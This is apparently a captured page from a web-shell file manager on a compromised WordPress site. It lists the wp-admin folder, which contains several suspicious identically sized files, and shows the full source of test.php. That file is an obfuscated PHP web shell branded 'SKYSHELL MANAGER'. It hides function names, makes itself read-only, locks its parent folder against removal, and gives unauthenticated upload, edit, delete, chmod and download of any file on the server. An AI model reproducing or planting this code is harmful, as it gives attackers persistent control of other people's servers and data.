golden hour
/home/godaofbq/dev.oxygenhealthsystems.com/wp-admin
⬆️ Go Up
Upload
File/Folder
Size
Actions
.htaccess
2 KB
Del
OK
about.php
18.73 KB
Del
OK
admin-ajax.php
5.03 KB
Del
OK
admin-functions.php
406 B
Del
OK
admin-header.php
8.86 KB
Del
OK
admin-post.php
2.02 KB
Del
OK
admin.php
12.27 KB
Del
OK
api.php
6.83 KB
Del
OK
authorize-application.php
10.09 KB
Del
OK
comment.php
11.35 KB
Del
OK
config.php
6.83 KB
Del
OK
contribute.php
5.59 KB
Del
OK
core.php
6.83 KB
Del
OK
credits.php
3.75 KB
Del
OK
css
-
Del
OK
custom-background.php
416 B
Del
OK
custom-header.php
426 B
Del
OK
customize.php
10.87 KB
Del
OK
data.php
6.83 KB
Del
OK
edit-comments.php
14.38 KB
Del
OK
edit-form-advanced.php
28.86 KB
Del
OK
edit-form-blocks.php
12.96 KB
Del
OK
edit-form-comment.php
8.34 KB
Del
OK
edit-link-form.php
6.21 KB
Del
OK
edit-tag-form.php
10.44 KB
Del
OK
edit-tags.php
22 KB
Del
OK
erase-personal-data.php
7.33 KB
Del
OK
error_log
344 B
Del
OK
export-personal-data.php
7.75 KB
Del
OK
export.php
11.02 KB
Del
OK
filefuns.php
5.92 KB
Del
OK
freedoms.php
4.5 KB
Del
OK
images
-
Del
OK
import.php
7.48 KB
Del
OK
includes
-
Del
OK
index.php
7.68 KB
Del
OK
install-helper.php
6.8 KB
Del
OK
install.php
17.1 KB
Del
OK
js
-
Del
OK
link-add.php
938 B
Del
OK
link-manager.php
4.26 KB
Del
OK
link-parse-opml.php
2.63 KB
Del
OK
link.php
2.89 KB
Del
OK
load-scripts.php
2.02 KB
Del
OK
maint
-
Del
OK
media-new.php
3.18 KB
Del
OK
media-upload.php
3.49 KB
Del
OK
media.php
819 B
Del
OK
menu-header.php
9.83 KB
Del
OK
menu.php
16.67 KB
Del
OK
module.php
6.83 KB
Del
OK
ms-admin.php
196 B
Del
OK
ms-delete-site.php
4.19 KB
Del
OK
ms-edit.php
216 B
Del
OK
ms-options.php
229 B
Del
OK
ms-sites.php
215 B
Del
OK
ms-themes.php
217 B
Del
OK
ms-upgrade-network.php
219 B
Del
OK
ms-users.php
215 B
Del
OK
my-sites.php
4.74 KB
Del
OK
nav-menus.php
48.12 KB
Del
OK
network
-
Del
OK
network.php
5.39 KB
Del
OK
options-discussion.php
15.4 KB
Del
OK
options-general.php
21.51 KB
Del
OK
options-head.php
548 B
Del
OK
options-media.php
6.35 KB
Del
OK
options-permalink.php
21.21 KB
Del
OK
options-privacy.php
9.95 KB
Del
OK
options-reading.php
10.03 KB
Del
OK
options-writing.php
9.1 KB
Del
OK
options.php
13.45 KB
Del
OK
plugin-editor.php
13.42 KB
Del
OK
plugin-install.php
6.83 KB
Del
OK
plugins.php
30.01 KB
Del
OK
post-new.php
2.7 KB
Del
OK
post.php
9.97 KB
Del
OK
press-this.php
2.34 KB
Del
OK
privacy-policy-guide.php
3.67 KB
Del
OK
privacy.php
2.48 KB
Del
OK
revision.php
5.71 KB
Del
OK
site-editor.php
7.05 KB
Del
OK
site-health-info.php
3.99 KB
Del
OK
site-health.php
10.2 KB
Del
OK
system.php
6.83 KB
Del
OK
term.php
2.2 KB
Del
OK
test.php
6.83 KB
Del
OK
theme-editor.php
15.42 KB
Del
OK
theme-install.php
23.37 KB
Del
OK
themes.php
46.95 KB
Del
OK
tools.php
3.43 KB
Del
OK
update-core.php
45.43 KB
Del
OK
update.php
12.79 KB
Del
OK
upload.php
14.85 KB
Del
OK
user
-
Del
OK
user-edit.php
39.6 KB
Del
OK
user-new.php
23.97 KB
Del
OK
users.php
23.29 KB
Del
OK
widgets-form-blocks.php
4.97 KB
Del
OK
widgets-form.php
19.17 KB
Del
OK
widgets.php
1.09 KB
Del
OK
wp-blog-header.php
2.74 KB
Del
OK
wp-cron.php
2.74 KB
Del
OK
wp-signup.php
6.83 KB
Del
OK
Edit: test.php
<?php $O00OO0=urldecode("%63%68%6d%6f%64"); $O00OO0(__FILE__, 0444); $V1=[$O00OO0,'realpath','getcwd','basename','move_uploaded_file','file_exists','mkdir','file_put_contents','rename','dirname','chmod','octdec','unlink','rmdir','header','urlencode','is_dir','scandir','usort','fileperms','filesize','round','htmlspecialchars','file_get_contents','phpversion']; // Path Handling Fix $P1 = isset($_GET['path']) ? $V1[1]($_GET['path']) : $V1[2](); if(!$P1 || $P1 == "") { $P1 = $V1[2](); } // Parent Directory Lock Logic (0555) $current_file_path = $V1[1](__FILE__); if ($current_file_path) { $current_dir = $V1[9]($current_file_path); $parent_dir = $V1[9]($current_dir); if($parent_dir && $V1[16]($parent_dir) && $parent_dir !== $current_dir){ @$V1[10]($parent_dir, 0555); } } $M1=""; if($_SERVER['REQUEST_METHOD']==='POST'){ if(isset($_FILES['file'])){if($V1[4]($_FILES['file']['tmp_name'],$P1.DIRECTORY_SEPARATOR.$V1[3]($_FILES['file']['name'])))$M1="File uploaded!";} if(isset($_POST['newfolder'])){$F1=$P1.DIRECTORY_SEPARATOR.$_POST['newfolder'];if(!$V1[5]($F1)){$V1[6]($F1);$M1="Folder created!";}} if(isset($_POST['newfile'])){$F2=$P1.DIRECTORY_SEPARATOR.$_POST['newfile'];if(!$V1[5]($F2)){$V1[7]($F2,'');$M1="File created!";}} if(isset($_POST['old_name'],$_POST['new_name'])){if($V1[8]($_POST['old_name'],$V1[9]($_POST['old_name']).DIRECTORY_SEPARATOR.$_POST['new_name']))$M1="Renamed!";} if(isset($_POST['chmod_file'],$_POST['chmod_value'])){if($V1[5]($_POST['chmod_file'])){$V1[10]($_POST['chmod_file'],$V1[11]($_POST['chmod_value']));$M1="Permissions changed!";}} if(isset($_POST['edit_file_path'],$_POST['edited_content'])){if($V1[5]($_POST['edit_file_path'])){$V1[10]($_POST['edit_file_path'],0644);$V1[7]($_POST['edit_file_path'],$_POST['edited_content']);$V1[10]($_POST['edit_file_path'],0444);$M1="Updated!";}} } if(isset($_GET['delete'])){$T1=urldecode($_GET['delete']);if($V1[5]($T1)){if($V1[16]($T1)){$V1[13]($T1);}else{$V1[12]($T1);}$V1[14]("Location: ?path=".$V1[15]($V1[9]($T1)));exit;}} if(isset($_GET['download'])){$D1=$_GET['download'];if($V1[5]($D1)){$V1[14]('Content-Type: application/octet-stream');$V1[14]('Content-Disposition: attachment; filename="'.$V1[3]($D1).'"');readfile($D1);exit;}} $fs = ($V1[5]($P1) && $V1[16]($P1)) ? $V1[17]($P1) : []; if(!empty($fs)){ $V1[18]($fs,function($a,$b)use($P1,$V1){return $V1[16]($P1.DIRECTORY_SEPARATOR.$b)-$V1[16]($P1.DIRECTORY_SEPARATOR.$a);}); } ?> <!DOCTYPE html><html><head><meta charset="UTF-8"><title>SKYSHELL MANAGER</title><style>body{background-color:#111;color:#0f0;font-family:Arial;padding:20px;}h2{text-align:center;font-size:36px;background:linear-gradient(90deg,#f00,#ff0,#0f0,#0ff,#00f);background-size:200%;color:transparent;-webkit-background-clip:text;animation:g 3s linear infinite;}@keyframes g{0%{background-position:200% 0%}50%{background-position:0% 100%}100%{background-position:200% 0%}}.php-v{position:absolute;top:10px;right:20px;font-size:14px;color:#0ff}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse;margin-top:20px}th,td{padding:10px;border:1px solid #333}tr:hover{background-color:#32CD32 !important; color:#000 !important;}tr:hover td span{color:#000 !important; font-weight:bold;}tr:hover td a{color:#000 !important; font-weight:700}.act-c{text-align:right}input,button,textarea{background:#222;color:#0f0;border:1px solid #444;padding:5px 10px;margin:5px 0}.msg{color:#32CD32;background-color:#222;padding:10px;text-align:center;margin:20px 0}.u-c{display:flex;justify-content:space-between;align-items:center}.emoji{color:#fff}.p-d a{color:#fff;text-decoration:none}.p-d a:hover{text-decoration:underline}</style></head><body> <h2><span class="emoji">📁</span> SKYSHELL MANAGER <span class="php-v">PHP v<?= $V1[24](); ?></span></h2> <?php if($M1): ?><div class="msg"><?= $M1 ?></div><?php endif; ?> <div class="u-c"><div><form method="post"><input type="text" name="newfolder" placeholder="Folder"><button type="submit">Create</button></form><form method="post"><input type="text" name="newfile" placeholder="File"><button type="submit">Create</button></form></div><div><form method="post" enctype="multipart/form-data"><input type="file" name="file" onchange="this.form.submit()"></form></div></div> <!-- Fixed Path Logic without extra spaces --> <p class="p-d"><b>Path:</b><?php $path_parts = explode(DIRECTORY_SEPARATOR, $P1); $accumulated_path = ""; foreach ($path_parts as $key => $part) { if ($part === "" && $key === 0) { $accumulated_path = DIRECTORY_SEPARATOR; echo "<a href='?path=".$V1[15]($accumulated_path)."'>root</a>/"; continue; } if ($part === "") continue; if (DIRECTORY_SEPARATOR === '\\') { $accumulated_path .= ($accumulated_path === "" ? "" : DIRECTORY_SEPARATOR) . $part; } else { $accumulated_path .= DIRECTORY_SEPARATOR . $part; } echo "<a href='?path=".$V1[15]($accumulated_path)."'>$part</a>/"; } ?></p> <table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Actions</th></tr> <?php foreach($fs as $f){if($f=='.' || $f=='..')continue;$fl=$P1.DIRECTORY_SEPARATOR.$f;$id=$V1[16]($fl);$pm=substr(sprintf('%o',$V1[19]($fl)),-4);$sz=$id?'-':$V1[21]($V1[20]($fl)/1024,2).' KB'; if($pm == '0444' || $pm == '0555' || $pm == '0400') { $cl = 'style="color:#f00;font-weight:bold;"'; } else { $cl = 'style="color:#0f0;font-weight:bold;"'; } echo "<tr><td>".($id?"📁":"📄")." <a href='?path=".$V1[15]($fl)."'>$f</a></td><td>$sz</td><td><span $cl>$pm</span></td><td class=\"act-c\"><a href='?delete=".$V1[15]($fl)."' onclick=\"return confirm('?')\">🗑️</a> <a href='?rename=".$V1[15]($fl)."'>🏷️</a> ".(!$id?"<a href='?path=".$V1[15]($P1)."&download=".$V1[15]($fl)."'>⬇️</a> <a href='?edit=".$V1[15]($fl)."'>✏️</a>":"")." <form method='post' style='display:inline;'><input type='hidden' name='chmod_file' value='$fl'><input type='text' name='chmod_value' placeholder='P' style='width:30px;'><button type='submit'>🔒</button></form></td></tr>";} ?> </table> <?php if(isset($_GET['rename'])): $t=$_GET['rename']; ?><div style="margin-top:20px;border:1px solid #444;padding:15px;"><h3 style="color:#fff;">Rename: <?= $V1[3]($t) ?></h3><form method="post" action="?path=<?= $V1[15]($P1) ?>"><input type="hidden" name="old_name" value="<?= $V1[22]($t) ?>"><input type="text" name="new_name" value="<?= $V1[22]($V1[3]($t)) ?>"><button type="submit">OK</button></form></div><?php endif; ?> <?php if(isset($_GET['edit'])&&is_file($_GET['edit'])): $te=$_GET['edit'];$c=$V1[22]($V1[23]($te)); ?><h3 style="color:#fff;">Edit: <?= $V1[3]($te) ?></h3><form method="post" action="?path=<?= $V1[15]($V1[9]($te)) ?>"><input type="hidden" name="edit_file_path" value="<?= $V1[22]($te) ?>"><textarea name="edited_content" rows="15" style="width:100%"><?= $c ?></textarea><br><button type="submit">Save</button></form><?php endif; ?> </body></html>
Save